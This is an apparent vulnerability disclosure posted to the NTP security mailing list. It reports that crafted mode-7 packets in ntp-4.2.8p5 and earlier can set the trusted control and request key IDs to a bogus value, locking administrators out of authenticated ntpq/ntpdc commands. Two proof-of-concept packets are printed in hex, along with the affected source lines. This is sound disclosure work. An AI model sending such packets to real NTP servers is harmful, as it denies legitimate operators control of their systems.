[ntp:security] security report

连一汉 lianyihan at 360.cn
Mon Jan 11 03:50:59 UTC 2016


Hi , I¡¯m Lian ,a security researcher in Qihoo 360. I found a vulnerability on ntp_request.c perhaps.

================ target environment =================

ntp-4.2.8p5 and lower

================================================
Command ¡°ntpdc -c trustedkey AAAA¡± can¡¯t be used now, but I can use these packets to simulate it.

Set_control_keyid:                                                 //command is : ntpdc ¨Cc trustedkey ¡­
17 80 03 21 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 86 11 09 1E B8 52
00 00 00 08 71 AA 5D 1B 92 C6 C9 D8 CB 76 5D CB
F8 D2 87 D9 (These red bits are wrong MD5 of other bits , in order to decrypt succeed ,you need calculate it yourself.)

Set_request_keyid:                                                // command is : ntpdc ¨Cc requestkey ¡­.
17 80 03 20 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 62 43 5D 1E B8 52
00 00 00 08 FB D2 B8 32 EF 89 37 21 73 F2 20 B4
94 82 95 59

After I sent these packets , the global variable info_auth_keyid or ctl_auth_keyid will be assigned ¡°41 41 41 41¡± :

Ntp_request.c:

2268:  info_auth_keyid = ntohl(*pkeyid);
¡­
2296:  ctl_auth_keyid = ntohl(*pkeyid);

¡¤         Because key ¡°41 41 41 41¡± isn¡¯t a valid key and not exist in ntp.keys , all the trusted ntpd administrators couldn¡¯t use all of the ntpdc and ntpq commands which need authentication ,even though they have the real key and password , until the ntpd.service be restarted.

Here is the details:

authentication function :

Ntp_control.c:
Line_1158: !res_authokay || res_keyid != ctl_auth_keyid
Authkeys.c:
Line_690:  if (0 == keyno || !authhavekey(keyno) || size < 4)
                     ¡­
Ntp_request.c:
Line 586:  ntohl(tailinpkt->keyid) != info_auth_keyid

¡¤         Here is the test screenshot:

Before I sent attack packet, I addpeer through ntpq commands sucess.
But I addpeer failed , after I sent the attack packet.

[cid:image003.jpg at 01D14C66.562D2770]

And it¡¯s same to ntpdc commands.

[cid:image004.png at 01D14C63.5CD17840]

And perhaps this problem is not serious because of the password protector. But it¡¯s a security issue after all .

Best regards !
Thanks !
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.ntp.org/private/security/attachments/20160111/a8a09aba/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image004.png
Type: image/png
Size: 3284 bytes
Desc: image004.png
URL: <http://lists.ntp.org/private/security/attachments/20160111/a8a09aba/attachment-0001.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image003.jpg
Type: image/jpeg
Size: 35848 bytes
Desc: image003.jpg
URL: <http://lists.ntp.org/private/security/attachments/20160111/a8a09aba/attachment-0001.jpg>


More information about the security mailing list